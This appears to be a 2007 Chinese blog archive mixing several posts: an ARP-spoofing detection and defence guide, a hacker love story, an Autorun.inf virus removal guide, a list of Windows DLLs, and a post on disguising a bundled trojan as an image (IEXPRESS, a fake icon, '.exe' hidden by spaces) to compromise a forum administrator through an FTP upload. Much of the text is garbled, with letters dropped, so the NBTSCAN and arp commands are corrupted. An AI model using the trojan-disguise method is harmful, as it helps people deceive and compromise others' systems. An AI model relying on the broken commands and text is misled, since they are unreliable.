切换到病毒主机上网后，如果用户已经登陆了传奇服务器，那么病毒主机就会经常伪造断线的假像，那么用户就得重新登录传奇服务器，这样病毒主机就可以盗号了。
由于ARP欺骗的木马程序发作的时候会发出大量的数据包导致局域网通讯拥塞以及其自身处理能力的限制，用户会感觉上网速度越来越慢。当ARP欺骗的木马程序停止运行时，用户会恢复从路由器上网，切换过程中用户会再断一次线。
【HiPER用户快速发现ARP欺骗木马】
在路由器的“系统历史记录”中看到大量如下的信息（440以后的路由器软件版本中才有此提示）：
MAC Chged 10.128.103.124
MAC Old 00:01:6c:36
MAC New 00:05:5d:60:c7:18
这个消息代表了用户的MAC地址发生了变化，在ARP欺骗木马开始运行的时候，局域网所有主机的MAC地址更新为病毒主机的MAC地址（即所有信息的MAC New地址都一致为病毒主机的MAC地址），同时在路由器的“用户统计”中看到所有用户的MAC地址信息都一样。
如果是在路由器的“系统历史记录”中看到大量MAC Old地址都一致，则说明局域网内曾经出现过ARP欺骗（ARP欺骗的木马程序停止运行时，主机在路由器上恢复其真实的MAC地址）。
【在局域网内查找病毒主机】
在上面我们已经知道了使用ARP欺骗木马的主机的MAC地址，那么我们就可以使用NBTSCAN（下载地址：
192.168.16.1-192.168.16.254）；或“ tsca 192.168.16.25-137”搜索192.168.16.25-137 网段，即192.168.16.25-192.168.16.137。输出结果第一列是IP地址，最后一列是MAC地址。
NBTSCAN的使用范例：
假设查找一台MAC地址为“000d870d585f”的病毒主机。
1）将压缩包中的 tscan.exe 和cygwin1.dll解压缩放到c:/下。
2）在Windows开始—运行—打开，输入cmd（windows98输入“command”），在出现的DOS窗口中输入：C:/ tsca -r 192.168.16.1/24（这里需要根据用户实际网段输入），回车。
C:/Document and Settings/ALANC:/ tsca -r 192.168.16.1/24 Warning: -r optio ot u orted under Windows. Ru ing without it. Doing NBT ame ca for addre e from 192.168.16.1/24 IP addre NetBIOS Name Server User MAC addre ------------------------------------------------------------------------------ 192.168.16.0 Sendto failed: Ca ot a ig requested addre 192.168.16.50 SERVER lt erverunknow gt 00-e0-4c-4d-96-c6 192.168.16.111 LLF lt erver> ADMINISTRATOR 00-22-55-66-77-88 192.168.16.121 UTT-HIPER lt erverunknow gt 00-0d-87-26-7d-78 192.168.16.175 JC lt erverunknow gt 00-07-95-e0-7c-d7 192.168.16.223 test123 lt erver> test123 00-0d-87-0d-58-5f 3）通过查询IP--MAC对应表，查出“000d870d585f”的病毒主机的IP地址为“192.168.16.223”。
【解决思路】
1、不要把你的网络安全信任关系建立在IP基础上或MAC基础上，（rarp同样存在欺骗的问题），理想的关系应该建立在IP+MAC基础上。
2、设置静态的MAC--IP对应表，不要让主机刷新你设定好的转换表。
3、除非很有必要，否则停止使用ARP，将ARP做为永久条目保存在对应表中。
4、使用ARP服务器。通过该服务器查找自己的ARP转换表来响应其他机器的ARP广播。确保这台ARP服务器不被黑。
5、使用"proxy"代理IP的传输。
6、使用硬件屏蔽主机。设置好你的路由，确保IP地址能到达合法的路径。（静态配置路由ARP条目），注意，使用交换集线器和网桥无法阻止ARP欺骗。
7、管理员定期用响应的IP包中获得一个rarp请求，然后检查ARP响应的真实性。
8、管理员定期轮询，检查主机上的ARP缓存。
9、使用防火墙连续监控网络。注意有使用SNMP的情况下，ARP的欺骗有可能导致陷阱包丢失。
【HiPER用户的解决方案】
建议用户采用双向绑定的方法解决并且防止ARP欺骗。
1、在PC上绑定路由器的IP和MAC地址：
1）首先，获得路由器的内网的MAC地址（例如HiPER网关地址192.168.16.254的MAC地址为0022aa0022aaHiPER管理界面--端口配置--局域网端口MAC地址）。
2）编写一个批处理文件rarp.bat内容如下： @echo off ar -d ar - 192.168.16.254 00-22-aa-00-22-aa 将文件中的网关IP地址和MAC地址更改为您自己的网关IP地址和MAC地址即可。
将这个批处理软件拖到“windows--开始--程序--启动”中。 3）如果是网吧，可以利用收费软件服务端程序（pubwin或者万象都可以）发送批处理文件rarp.bat到所有客户机的启动目录。Windows2000的默认启动目录为“C:/Document and Settings/All Users「开始」菜单程序启动”。
2、在路由器上绑定用户主机的IP和MAC地址（440以后的路由器软件版本支持）：
在HiPER管理界面--高级配置--用户管理中将局域网每台主机均作绑定。
( Fri, 30 Mar 2007 13:51:43 +0800 )
Description: 他是一位不折不扣的黑客，他入侵过无数系统，但他都没有把系统进行破坏，只是进入出来时在桌面新建了一个文本文件，告诉系统主人的漏洞出自那里与打补丁的方法。
　　一天他又进入了一个系统，并重复做了在桌面上新建一个文本文件。几天后，他又进入了这个系统，发现补丁没打上，于是又点了那个文本文件，打开时多了几行文字。“为什么我到商店云去买不到打电脑补丁的胶布呢？”他笑了笑，从文字上看这个系统的主人是一个菜鸟，并从笔迹上看，还是一个女孩。于是他又在后面打上“这不是什么布之类的东西，不能用胶布补的。”第二天，他又进入了这个系统，打开文本，发现那个女孩问了“你为什么能进入我的电脑。”他回答说“因为我是黑客啊！”就这样日复一日，他与女孩渐渐熟了，他们什么都谈，人生、理想、天文、地理无所不谈。渐渐地女孩对他产生了感情，而他也对女孩产生的好感，但他们还是默默聊着。正当文本达到30kb时，女孩说“我们可不可以见面。”他回了“为什么要见面呢？”女孩说“因为我喜欢你。”他沉默了很久，终于用熟练的五笑打入了“我们只是朋友。”女孩转了话题。
　　不久以后，女孩搬了家，搬到新家时女孩连上网的IP也改了。女孩还是把那个文件放在桌面上，希望那个他还会与女孩聊天，女孩却不知道自己的IP改了会使他找不到，但女孩还是会每天准时打开那个文件，看看是否有他的话语。而他却发现女孩已经不在了，于是他疯狂地扫描系统，希望能发现女孩的踪迹，但扫描却让他失望了。于是他又扩大了扫描范围，并编写了一个程序，如果有女孩的消息会马上回复，终于有一天他发现程序中有一条关于女孩的消息。他马上按程序提供的IP地址进入了女孩的系统。找开桌而那个文本文件，他发现另一个男孩与女孩正好聊着，女孩把那个男孩一直当成他了，他相信那个男孩也是出于好意。就在这时，那一幕又重复不久前的那个故事，女孩打出了“我喜欢你。”男孩沉默了很久打出“我们只是朋友。”他马上把男孩的文字删掉，以最快的速度打了“我也喜欢你。”刷新了文本，他下了线。
　　走出屋外，天空下着雪，雪花从天空中轻盈的飘下来，他仿佛看女孩的身影。他已经失去了一次机会，他不想那个男孩也失掉这个机会........ ( Tue, 27 Mar 2007 20:36:21 +0800 )
Description: 某日,上了不健康的网站,之后机子怪怪的.用IceSword看了一下,我都没有上网!就有了IEXPLER那个东
东,很明显,中了灰鸽子了.不过,服务很明显,看来!配木马的那个人!也不怎么样啊!哈!两下就搞定了!.
唉!可怜的灰鸽子,就这样倒在他这种人的手中,郁闷!不要认为自己搞了点东西就乱来了咯!~或者,你可能
时刻都关注着我的屏幕,关注我的密码!关注...那么请你,走远点吧!你的那些东西,太垃圾,,如果,你想与
我较量一下的话!那就先格了我的DISK吧!呵呵.我不怕的!
( Sun, 25 Mar 2007 22:23:12 +0800 )
Description:
有一个很想拿到权限的论坛，突然看到管理员征集XX资料的照片，并开放了一个FTP上传，于是想到了捆绑木马文件欺骗管理员的方法。
我习惯用windows自带的IEXPRESS捆绑文件，捆好了文件后用Restorator改个图标，如图
把其他的资源全部删除，只剩下RCData和图标，如图
保存后这样就得到了一个有文件夹图标的捆绑EXE文件，把这个文件的名字改为图片.exe,同时.exe后缀前加很多空格，如图
最后得到下图这样的效果,把这个文件打包成RAR文件，直接传到管理员的FTP，呵呵~结果就不用说了，欺骗效果百分之百。
( Wed, 21 Mar 2007 08:51:47 +0800 )
Description:
时下，我们常常会在硬盘的各个分区根目录下面看到“Autorun.inf”这样的文件，并且用鼠标双击磁盘分区图标时，往往无法打开对应分区窗口;遭遇类似上述现象时，那几乎就能断定本地计算机系统已经感染了近来非常猖獗的闪盘病毒，这种病毒一般通过“Autorun.inf”文件进行传播，只要我们双击闪盘分区图标时，该病毒就会通过“Autorun.inf”文件中的设置来自动激活病毒，然后将“Autorun.inf”文件同时拷贝到其他分区，导致其他分区都无法用双击鼠标的方法打开。为了保护系统安全，本文下面就为各位献上这类病毒解除方法以及预防措施，希望下面内容能对大家有用! 　　赤手空拳，删除“Autorun.inf”文件 　　当计算机系统不小心感染了“Autorun.inf”文件病毒时，该病毒就会自动在本地硬盘的所有分区根目录下面创建一个“Autorun.inf”文件，该文件在默认状态下具有隐藏属性，用普通方法是无法直接将它删除掉的。要想删除“Autorun.inf”病毒文件，我们可以按照如下方法来操作： 图1
　　首先用鼠标双击系统桌面中的“我的电脑”图标，在其后弹出的窗口中依次单击“工具”/“文件夹选项”菜单命令，打开文件夹选项设置窗口，单击该窗口中的“查看”标签，并在对应标签页面中选中“显示所有文件和文件夹”项目，同时将“隐藏受保护的操作系统文件”的选中状态取消掉，再单击“确定”按钮，这么一来“Autorun.inf”病毒文件就会显示在各个分区根目录窗口中了;其次用鼠标右键单击“我的电脑”窗口中的某个磁盘分区图标，从弹出的快捷菜单中执行“打开”命令，进入到该分区的根目录窗口，在其中我们就能看到“Autorun.inf”病毒文件的“身影”了;再用鼠标右键单击“Autorun.inf”文件，并执行右键菜单中的“打开”命令将“Autorun.inf”文件打开，随后我们就会看到里面的“open=xxx.exe”内容，其实“xxx.exe”就是具体的病毒名称。倘若这类病毒没有进程保护时，我们只需要将“xxx.exe”文件以及各个“Autorun.inf”文件直接删除掉，就能将闪盘病毒从系统中清除掉了 　　下面为了防止病毒再次运行发作，我们还需要将遭受病毒破坏的磁盘关联修改过来。在修改磁盘关联时，必须先依次单击“开始”/“运行”命令，打开系统运行对话框，在其中执行注册表编辑命令“regedit”，打开本地系统的注册表编辑窗口;在该编辑窗口的左侧显示区域，先用鼠标展开“HKEY_CLASSES_ROOT”注册表分支，然后在该分支下面依次选择“Driveshell”项目，在对应“shell”项目的右侧列表区域(如图2所示)，用鼠标双击“默认”键值，在其后弹出的数值设置窗口中将“默认”键值数值修改为“none” 图2
　　接下来再用鼠标展开“HKEY_CURRENT_USER”注册表分支，然后在该分支下面依次选择“SoftwareMicrosoftWindowsCurrentVersionExplorer”项目，在对应“Explorer”项目的右侧列表区域，检查一下是否存在一个名为“ountPoints2”键值，一旦发现该键值的话，我们必须及时将它删除掉，最后按一下键盘上的F5功能键，来刷新系统注册表的设置，这么一来闪盘病毒就被我们手工清除掉了，此时当我们再尝试用双击方法打开分区窗口时，就会看到对应分区窗口能被正常打开了。 　　借用外力，抑制闪盘病毒再生 　　倘若我们的计算机不小心中了闪盘病毒的黑手，尝试使用上面的方法无法删除“Autorun.inf”文件，而且重新***了计算机系统后仍然无法使用双击鼠标方法打开分区窗口时，我们可以选用一款名为“费尔木马强力清除助手”的工具，来让本地系统摆脱闪盘病毒的“干扰”，并且有效抑制该类型病毒的继续发作。下面就是抑制闪盘病毒再生的具体操作步骤： 　　首先从网上将“费尔木马强力清除助手”工具下载到本地硬盘中，并对它进行正确***;***完毕后，直接运行“费尔木马强力清除助手”程序，在其后弹出的程序界面中选中“抑制文件再次生成”项目，同时在“文件名”文本框中输入“Autorun.inf”文件的具体路径信息，例如笔者在这里输入“C:Autorun.inf”，再单击“清除”按钮，这么一来C分区下面的“Autorun.inf”文件就被清除干净了;按照相同的操作方法，再将其他分区中的“Autorun.inf”文件删除干净。 　　接着我们再按常规方法重新***一下操作系统，或者直接通过Ghost程序来快速恢复一下系统，相信这么一来重装过后的系统就会摆脱闪盘病毒的“干扰”了。 　　小小巧招，预防闪盘病毒再次袭击 　　当摆脱了闪盘病毒的“干扰”后，我们现在是不是就可以高枕无忧了呢?其实，闪盘病毒随时可能再次袭击我们，为此我们必须采取有效措施，让本地系统远离闪盘病毒。而要预防闪盘病毒再次袭击的方法非常简单，我们只需要在闪盘根目录下面自己手工创建一个“Autorun.inf”文件，这样一来闪盘病毒日后就无法往闪盘根目录下面自动生成“Autorun.inf”病毒文件了，毕竟相同的目录下面是不允许创建同名文件或同名文件夹的，那样的话闪盘病毒就无法通过闪盘进行非法传播了。同样地，这种预防闪盘病毒的方法也适用于移动硬盘! ( Wed, 14 Mar 2007 12:52:20 +0800 )
Description: 梦想吾知可否实现,程序员对我来讲,好似好近,不过,又好似好远,果种感觉,吾知每一位好似我甘样的
人,有没呢种感觉呢,反正以家真系有D紧张啊,内容出乎意料的
多.吾知可吾可以通过呢.望就望可以过啦.
( Tue, 13 Mar 2007 16:38:22 +0800 )
Description:
aclui.dll .....Security Descriptor Editor，没有它，注册表编缉器会无法运行
ACTIVEDS.DLL .....(AD 路由层 DLL). 没有它, 打开事件查看器会出错
ADSLDPC.DLL ......AD LDAP 提供程序 C DLL
ADVAPI32.DLL .....(高级 Window 32 基本 API)...这个 avicap32.dll 用于将从数码摄像头捕获的视频另存为 ***I 格式. 如果你正在录制视频或是正在视频聊天, 那么你将服务终止这个进程
ADVPACK.DLL ......(Advpack Library). Window 用它来验证 .inf 文件. 如果 advpack.dll 不可用, window 将无法正常工作. (没有它, 打开系统属性会出错.)
ASYCFILT.DLL ....我所***的一个程序 StatBar, 需要这个文件
ATL.DLL .......... Window XP ATL 模块 (Unicode)
AUTHZ.DLL ........认证框架
BASESRV.DLL ......Window NT BASE API Server DLL
BATMETER.DLL .....(电池助手 DLL). 打开电源选项需要这个文件
bootvid.dll .....VGA 启动驱动
BROWSELC.DLL .....外壳浏览器用户界面库
browser.dll .....Computer Browser Service DLL
BROWSEUI.DLL ..... 外壳浏览器用户界面库
browsewm.dll ...BrowseWM Player
CABINET.DLL ......(Microsoft® Ca 文件 API). 想要正常打开系统选项就要保留这个文件
CALC.EXE .......(计算器). Window 自带的计算器程序
CFGMGR32.DLL ...配置管理转发器 DLL，没有它，无法在资源管理器中对磁盘进行格式化
clb.dll .....Colum List Box，没有它，注册表编缉器会无法运行
CMD.EXE ....(命令行).可提供 Window NT 下的命令行提示符 (MS-DOS 外壳解释程序)
comcat.dll .....Microsoft C 运行时库文件
COMCTL32.DLL .....通用控件库
COMDLG32.DLL .....通用对话框 DLL
co ole.dll ....控制面板控制台小程序
control.exe ....Window 控制面板 (这个不是实际上的控制面板.)
CONVERT.EXE ....(转换). 用于将分区格式从 FAT 转为 NTFS 以及从 NTFSv4 转为 NTFSv5
CREDUI.DLL .......授权***管理程序用户界面
crtdll.dll .....加密管理器
CRYPT32.DLL ......32 位加密 API
CRYPTDLL.DLL .....加密管理程序
CRYPTUI.DLL ......Microsoft 加密用户界面提供程序
CSRSRV.DLL .......客户端服务器运行时进程
CSRSS.EXE ........(客户端-服务器运行时服务器子系统). 用于维护Win32 系统环境控制台以及其它基本功能.
desk.cpl ......显示属性
deskmon.dll .... 高级显示监视器属性
devenum.dll ....设备枚举
devmgr.dll .....设备管理器 MMC 管理工具
diskcopy.dll ...Window DiskCopy
dmintf.dll ..... 磁盘管理 DCOM 接口存根
dmutil.dll ..... 逻辑磁盘管理器工具库
DNSAPI.DLL .......DNS 客户端 API D